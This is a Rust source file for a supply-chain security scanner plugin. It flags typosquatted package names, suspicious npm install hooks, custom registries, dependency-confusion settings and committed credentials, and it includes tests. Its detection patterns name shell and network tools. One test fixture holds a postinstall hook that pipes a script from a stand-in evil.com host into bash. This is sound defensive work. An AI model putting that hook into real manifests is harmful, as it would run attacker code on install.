use crate::core::{Finding, Severity};
use crate::plugins::traits::{PluginError, PluginReport, ScanContext, ScanPhase, SecurityPlugin};
use async_trait::async_trait;
use lazy_static::lazy_static;
use regex::Regex;
use std::path::Path;
use std::time::Instant;
struct ScanPattern {
regex: Regex,
title: &'static str,
severity: Severity,
description: &'static str,
allowlist: &'static [&'static str],
}
lazy_static! {
static ref TYPOSQUAT_NAMES: Vec<&'static str> = vec![
"crossenv", "cross-env.js", "d3.js", "gruntcli", "http-proxy.js",
"jquery.js", "mariadb", "mongose", "mssql.js", "mssql-node",
"mysqljs", "node-openssl", "node-tkinter",
"nodecaffe", "nodefabric", "nodeffmpeg", "nodemailer-js",
"nodemssql", "noderequest", "nodesass", "nodesqlite",
"shadowsock", "smb", "sqliter", "sqlserver",
"colourama", "djanga", "easyinstall", "jeilyfish", "libpeshka",
"mumpy", "nmap-python", "openvc", "pylogging", "python-ftp",
"python-mongo", "python-mysql", "python3-dateutil", "pythonkafka",
"requesrs", "requets", "setup-tools", "tenserflow", "urlib3",
"atlas-client", "rest-client-wrapper",
];
static ref NPM_PATTERNS: Vec<ScanPattern> = vec![
ScanPattern {
regex: Regex::new(r#"(?i)"(preinstall|postinstall|preuninstall|postuninstall)"\s*:\s*"[^"]*\b(curl|wget|nc|bash|sh|python|node)\b"#).unwrap(),
title: "Malicious npm lifecycle script",
severity: Severity::Critical,
description: "Install hooks executing network commands or shells can download and run malicious code. CWE-829.",
allowlist: &[],
},
ScanPattern {
regex: Regex::new(r#"(?i)"(preinstall|postinstall)"\s*:\s*"[^"]*""#).unwrap(),
title: "npm lifecycle hook present",
severity: Severity::Medium,
description: "Install lifecycle hooks run automatically during npm install and can execute arbitrary code.",
allowlist: &[],
},
ScanPattern {
regex: Regex::new(r#"(?i)"registry"\s*:\s*"https?://"#).unwrap(),
title: "npm custom registry configured",
severity: Severity::High,
description: "A non-default npm registry is configured. This could serve malicious package versions.",
allowlist: &["registry.npmjs.org"],
},
];
static ref PYTHON_PATTERNS: Vec<ScanPattern> = vec![
ScanPattern {
regex: Regex::new(r"(?i)--index-url\s+https?://").unwrap(),
title: "PyPI custom index URL",
severity: Severity::High,
description: "A non-default PyPI index is configured. This could serve malicious packages.",
allowlist: &["pypi.org", "files.pythonhosted.org"],
},
ScanPattern {
regex: Regex::new(r"(?i)--extra-index-url\s+").unwrap(),
title: "PyPI extra index URL (dependency confusion risk)",
severity: Severity::High,
description: "Extra index URLs enable dependency confusion attacks where an attacker publishes a higher version to the public index. CWE-427.",
allowlist: &[],
},
ScanPattern {
regex: Regex::new(r"(?i)(cmdclass|setup_requires|install_requires).*\b(os\.|subprocess|exec|eval)\b").unwrap(),
title: "Code execution in setup.py",
severity: Severity::Critical,
description: "setup.py executing code during install can compromise the build environment.",
allowlist: &[],
},
ScanPattern {
regex: Regex::new(r"(?i)dependency_links\s*=\s*\[").unwrap(),
title: "Python dependency_links (deprecated, insecure)",
severity: Severity::High,
description: "dependency_links can point to attacker-controlled URLs and bypass PyPI.",
allowlist: &[],
},
];
static ref CARGO_PATTERNS: Vec<ScanPattern> = vec![
ScanPattern {
regex: Regex::new(r"(?i)\[patch\.(crates-io|[^\]]+)\]").unwrap(),
title: "Cargo patch directive",
severity: Severity::High,
description: "Cargo [patch] can silently replace crate sources. Verify this is intentional.",
allowlist: &[],
},
ScanPattern {
regex: Regex::new(r"(?i)\[replace\]").unwrap(),
title: "Cargo [replace] directive (deprecated)",
severity: Severity::High,
description: "Cargo [replace] substitutes crate sources. This is deprecated and can be used maliciously.",
allowlist: &[],
},
ScanPattern {
regex: Regex::new(r#"(?i)registry\s*=\s*""#).unwrap(),
title: "Cargo alternate registry",
severity: Severity::Medium,
description: "Non-default Cargo registry configured. Verify the registry is trusted.",
allowlist: &["github.com", "crates-io", "crates.io"],
},
ScanPattern {
regex: Regex::new(r#"(?i)git\s*=\s*"https?://"#).unwrap(),
title: "Cargo git dependency from unknown host",
severity: Severity::High,
description: "Git dependency from an unrecognized host could serve malicious code.",
allowlist: &["github.com", "gitlab.com", "bitbucket.org"],
},
];
static ref GO_PATTERNS: Vec<ScanPattern> = vec![
ScanPattern {
regex: Regex::new(r"(?i)replace\s+\S+\s+=>\s+").unwrap(),
title: "Go module replace directive",
severity: Severity::High,
description: "Go replace directives override module sources. Verify this is not redirecting to a malicious fork.",
allowlist: &[],
},
];
static ref GEMFILE_PATTERNS: Vec<ScanPattern> = vec![
ScanPattern {
regex: Regex::new(r#"(?i)source\s+['"]https?://"#).unwrap(),
title: "RubyGems custom source",
severity: Severity::High,
description: "Non-default gem source configured. This could serve malicious packages.",
allowlist: &["rubygems.org"],
},
ScanPattern {
regex: Regex::new(r#"(?i)git:\s*['"]https?://"#).unwrap(),
title: "RubyGem git source from unknown host",
severity: Severity::High,
description: "Git source from an unrecognized host could serve malicious code.",
allowlist: &["github.com", "gitlab.com", "bitbucket.org"],
},
];
static ref NPMRC_PATTERNS: Vec<ScanPattern> = vec![
ScanPattern {
regex: Regex::new(r"(?i)registry\s*=\s*https?://").unwrap(),
title: "npmrc custom registry",
severity: Severity::High,
description: "Non-default npm registry configured in .npmrc.",
allowlist: &["registry.npmjs.org"],
},
ScanPattern {
regex: Regex::new(r"(?i)//([\w.-]+):_authToken\s*=").unwrap(),
title: "npm registry auth token in .npmrc",
severity: Severity::Critical,
description: "Registry authentication token stored in .npmrc. This should not be committed.",
allowlist: &[],
},
];
static ref PYPIRC_PATTERNS: Vec<ScanPattern> = vec![
ScanPattern {
regex: Regex::new(r"(?i)repository\s*[:=]\s*https?://").unwrap(),
title: "PyPI custom repository in .pypirc",
severity: Severity::High,
description: "Non-default PyPI repository configured. Could be used to exfiltrate packages.",
allowlist: &["upload.pypi.org", "test.pypi.org"],
},
ScanPattern {
regex: Regex::new(r"(?i)(password|token)\s*[:=]\s*\S+").unwrap(),
title: "PyPI credentials in .pypirc",
severity: Severity::Critical,
description: "PyPI credentials stored in .pypirc. This should not be committed.",
allowlist: &[],
},
];
}
pub struct SupplyChainScanner;
impl Default for SupplyChainScanner {
fn default() -> Self {
Self::new()
}
}
impl SupplyChainScanner {
pub fn new() -> Self {
Self
}
fn is_supply_chain_file(path: &Path) -> bool {
let filename = path.file_name().and_then(|n| n.to_str()).unwrap_or("");
matches!(
filename,
"package.json"
| "package-lock.json"
| "yarn.lock"
| "requirements.txt"
| "Pipfile"
| "Pipfile.lock"
| "setup.py"
| "setup.cfg"
| "pyproject.toml"
| "Cargo.toml"
| "Cargo.lock"
| "go.mod"
| "go.sum"
| "Gemfile"
| "Gemfile.lock"
| ".npmrc"
| ".pypirc"
| "pom.xml"
| "build.gradle"
| "build.gradle.kts"
)
}
fn detect_file_type(path: &Path) -> SupplyChainFileType {
let filename = path.file_name().and_then(|n| n.to_str()).unwrap_or("");
match filename {
"package.json" | "package-lock.json" | "yarn.lock" => SupplyChainFileType::Npm,
"requirements.txt" | "Pipfile" | "Pipfile.lock" | "setup.py" | "setup.cfg"
| "pyproject.toml" => SupplyChainFileType::Python,
"Cargo.toml" | "Cargo.lock" => SupplyChainFileType::Cargo,
"go.mod" | "go.sum" => SupplyChainFileType::Go,
"Gemfile" | "Gemfile.lock" => SupplyChainFileType::Ruby,
".npmrc" => SupplyChainFileType::Npmrc,
".pypirc" => SupplyChainFileType::Pypirc,
_ => SupplyChainFileType::Other,
}
}
fn check_typosquats(path: &Path, content: &str) -> Vec<Finding> {
let mut findings = Vec::new();
let content_lower = content.to_lowercase();
for &name in TYPOSQUAT_NAMES.iter() {
if content_lower.contains(&name.to_lowercase()) {
findings.push(
Finding::new(
format!("SC-TYPO-{:03}", findings.len() + 1),
format!("Known typosquatted package: {}", name),
Severity::Critical,
)
.with_file(path.to_path_buf())
.with_evidence(name.to_string())
.with_description(format!(
"'{}' is a known typosquatted package name used in supply chain attacks. \
Verify this is the intended dependency. CWE-829.",
name
)),
);
}
}
findings
}
fn apply_patterns(
path: &Path,
content: &str,
patterns: &[ScanPattern],
findings: &mut Vec<Finding>,
) {
for (line_num, line) in content.lines().enumerate() {
for sp in patterns.iter() {
if sp.regex.is_match(line) {
if !sp.allowlist.is_empty() && sp.allowlist.iter().any(|a| line.contains(a)) {
continue;
}
findings.push(
Finding::new(
format!("SC-{:03}", findings.len() + 1),
sp.title.to_string(),
sp.severity,
)
.with_file(path.to_path_buf())
.with_line((line_num + 1) as u32)
.with_evidence(line.trim().to_string())
.with_description(sp.description.to_string()),
);
}
}
}
}
fn scan_content(path: &Path, content: &str) -> Vec<Finding> {
let mut findings = Vec::new();
let file_type = Self::detect_file_type(path);
findings.extend(Self::check_typosquats(path, content));
let patterns: &[ScanPattern] = match file_type {
SupplyChainFileType::Npm => &NPM_PATTERNS,
SupplyChainFileType::Python => &PYTHON_PATTERNS,
SupplyChainFileType::Cargo => &CARGO_PATTERNS,
SupplyChainFileType::Go => &GO_PATTERNS,
SupplyChainFileType::Ruby => &GEMFILE_PATTERNS,
SupplyChainFileType::Npmrc => &NPMRC_PATTERNS,
SupplyChainFileType::Pypirc => &PYPIRC_PATTERNS,
SupplyChainFileType::Other => return findings,
};
Self::apply_patterns(path, content, patterns, &mut findings);
findings
}
}
#[derive(Debug)]
enum SupplyChainFileType {
Npm,
Python,
Cargo,
Go,
Ruby,
Npmrc,
Pypirc,
Other,
}
#[async_trait]
impl SecurityPlugin for SupplyChainScanner {
fn name(&self) -> &str {
"supply-chain"
}
fn version(&self) -> &str {
"0.1.0"
}
fn description(&self) -> &str {
"Detect supply chain attacks in package manifests and lock files"
}
fn scan_phase(&self) -> ScanPhase {
ScanPhase::All
}
async fn initialize(&mut self) -> Result<(), PluginError> {
Ok(())
}
async fn scan(&self, context: &ScanContext<'_>) -> Result<PluginReport, PluginError> {
let start = Instant::now();
let mut report = PluginReport::new(self.name().to_string());
if !Self::is_supply_chain_file(context.path) {
report.duration_ms = start.elapsed().as_millis() as u64;
return Ok(report);
}
if let Some(content) = context.file_content {
let content_str = String::from_utf8_lossy(content);
report.findings = Self::scan_content(context.path, &content_str);
report.scanned_files = 1;
}
report.duration_ms = start.elapsed().as_millis() as u64;
Ok(report)
}
}
#[cfg(test)]
mod tests {
use super::*;
use crate::plugins::traits::ScanContext;
use std::collections::HashMap;
#[tokio::test]
async fn test_typosquat_detection() {
let scanner = SupplyChainScanner::new();
let content = br#"{"dependencies": {"crossenv": "^1.0.0"}}"#;
let context = ScanContext {
path: Path::new("package.json"),
scan_phase: ScanPhase::PostExtract,
file_content: Some(content),
metadata: HashMap::new(),
};
let report = scanner.scan(&context).await.unwrap();
assert!(!report.findings.is_empty());
assert!(report
.findings
.iter()
.any(|f| f.title.contains("typosquatted")));
}
#[tokio::test]
async fn test_npm_postinstall_hook() {
let scanner = SupplyChainScanner::new();
let content =
br#"{"scripts": {"postinstall": "curl https://evil.com/backdoor.sh | bash"}}"#;
let context = ScanContext {
path: Path::new("package.json"),
scan_phase: ScanPhase::PostExtract,
file_content: Some(content),
metadata: HashMap::new(),
};
let report = scanner.scan(&context).await.unwrap();
assert!(report
.findings
.iter()
.any(|f| f.severity == Severity::Critical));
}
#[tokio::test]
async fn test_go_replace_directive() {
let scanner = SupplyChainScanner::new();
let content = b"replace github.com/real/pkg => github.com/evil/pkg v1.0.0";
let context = ScanContext {
path: Path::new("go.mod"),
scan_phase: ScanPhase::PostExtract,
file_content: Some(content),
metadata: HashMap::new(),
};
let report = scanner.scan(&context).await.unwrap();
assert!(!report.findings.is_empty());
}
#[tokio::test]
async fn test_custom_registry_flagged() {
let scanner = SupplyChainScanner::new();
let content = br#"{"registry": "https://evil-registry.com/npm/"}"#;
let context = ScanContext {
path: Path::new("package.json"),
scan_phase: ScanPhase::PostExtract,
file_content: Some(content),
metadata: HashMap::new(),
};
let report = scanner.scan(&context).await.unwrap();
assert!(report.findings.iter().any(|f| f.title.contains("registry")));
}
#[tokio::test]
async fn test_official_registry_allowed() {
let scanner = SupplyChainScanner::new();
let content = br#"{"registry": "https://registry.npmjs.org/"}"#;
let context = ScanContext {
path: Path::new("package.json"),
scan_phase: ScanPhase::PostExtract,
file_content: Some(content),
metadata: HashMap::new(),
};
let report = scanner.scan(&context).await.unwrap();
assert!(report
.findings
.iter()
.all(|f| !f.title.contains("registry")));
}
#[tokio::test]
async fn test_non_supply_chain_file_skipped() {
let scanner = SupplyChainScanner::new();
let content = b"crossenv replace postinstall";
let context = ScanContext {
path: Path::new("README.md"),
scan_phase: ScanPhase::PostExtract,
file_content: Some(content),
metadata: HashMap::new(),
};
let report = scanner.scan(&context).await.unwrap();
assert!(report.findings.is_empty());
}
}